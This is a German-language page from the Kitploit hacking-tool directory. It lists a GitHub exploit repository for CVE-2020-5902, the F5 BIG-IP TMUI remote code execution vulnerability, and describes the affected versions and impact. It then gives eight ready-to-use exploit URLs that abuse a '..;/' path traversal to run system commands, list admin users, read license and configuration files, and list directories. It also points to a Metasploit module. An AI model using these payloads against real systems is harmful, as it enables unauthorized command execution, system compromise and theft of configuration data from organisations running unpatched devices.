Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-5902 — [CVE-2020-5902] F5 BIG-IP Remote Code Execution (RCE) | Kitploit
Tools/GitHubGitHub/murataydemir/cve-2020-5902
Exploit-FrameworksSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubmurataydemir/cve-2020-5902

CVE-2020-5902

[CVE-2020-5902] F5 BIG-IP Remote Code Execution (RCE)

Repository anzeigen
215vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

[CVE-2020-5902] F5 BIG-IP Traffic Management User Interface (TMUI) Remote Code Execution


In den BIG-IP-Versionen 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 und 11.6.1-11.6.5.1 weist die Traffic Management User Interface (TMUI), auch als Configuration-Utility bezeichnet, eine Remote-Code-Execution-Sicherheitslücke (RCE) auf nicht offengelegten Seiten auf.

Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern oder authentifizierten Benutzern mit Netzwerkzugriff auf das Configuration-Utility über den BIG-IP-Verwaltungsport und/oder Self-IPs, beliebige Systembefehle auszuführen, Dateien zu erstellen oder zu löschen, Dienste zu deaktivieren und/oder beliebigen Java-Code auszuführen. Diese Schwachstelle kann zu einer vollständigen Kompromittierung des Systems führen. Das BIG-IP-System im Appliance-Modus ist ebenfalls anfällig. Dieses Problem tritt nicht auf der Datenebene (Data Plane) auf; nur die Steuerungsebene (Control Plane) ist betroffen.

root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/

Die ursprüngliche Sicherheitsmeldung wurde von F5 veröffentlicht; Sie können sie hier abrufen.
Darüber hinaus gibt es ein verfügbares Metasploit-Modul für CVE-2020-5902 mit der Einstufung „Excellent“. Sie finden den Ruby-Code des Metasploit-Moduls für exploits/linux/http/f5_bigip_tmui_rce.rb.

Tool herunterladen